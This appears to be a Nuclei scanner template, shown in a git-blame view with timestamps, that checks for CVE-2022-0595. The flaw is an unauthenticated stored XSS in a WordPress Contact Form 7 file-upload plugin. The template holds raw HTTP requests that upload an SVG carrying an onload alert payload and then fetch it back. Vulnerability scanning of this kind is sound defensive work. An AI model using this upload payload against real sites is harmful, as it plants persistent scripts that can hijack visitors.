2022-04-24 09:53:15 +00:00
id : CVE-2022-0595
info :
2022-09-10 01:55:52 +00:00
name : WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting
2022-04-24 09:53:15 +00:00
author : akincibor
2022-09-10 02:12:57 +00:00
severity : medium
2022-09-10 01:55:52 +00:00
description : |
WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.
2022-04-24 09:53:15 +00:00
reference :
- https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset/2686614
2022-04-24 10:05:04 +00:00
classification :
2022-09-10 02:12:57 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-09-10 01:55:52 +00:00
cve-id : CVE-2022-0595
2022-09-10 02:12:57 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:*:*:*
epss-score : 0.00135
2022-09-09 17:34:37 +00:00
tags : cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2022-04-24 09:53:15 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-24 09:53:15 +00:00
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------92633278134516118923780781161
-----------------------------92633278134516118923780781161
Content-Disposition : form-data; name="size_limit"
10485760
-----------------------------92633278134516118923780781161
Content-Disposition : form-data; name="action"
dnd_codedropz_upload
-----------------------------92633278134516118923780781161
Content-Disposition : form-data; name="type"
click
-----------------------------92633278134516118923780781161
Content-Disposition : form-data; name="upload-file"; filename="{{randstr}}.svg"
Content-Type : image/jpeg
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
-----------------------------92633278134516118923780781161 --
- |
GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1
Host : {{Hostname}}
req-condition : true
matchers :
- type : dsl
dsl :
- 'contains(body_2, "alert(document.domain)")'
- 'status_code_2 == 200'
condition : and
2022-09-10 01:55:52 +00:00
# Enhanced by md on 2022/09/08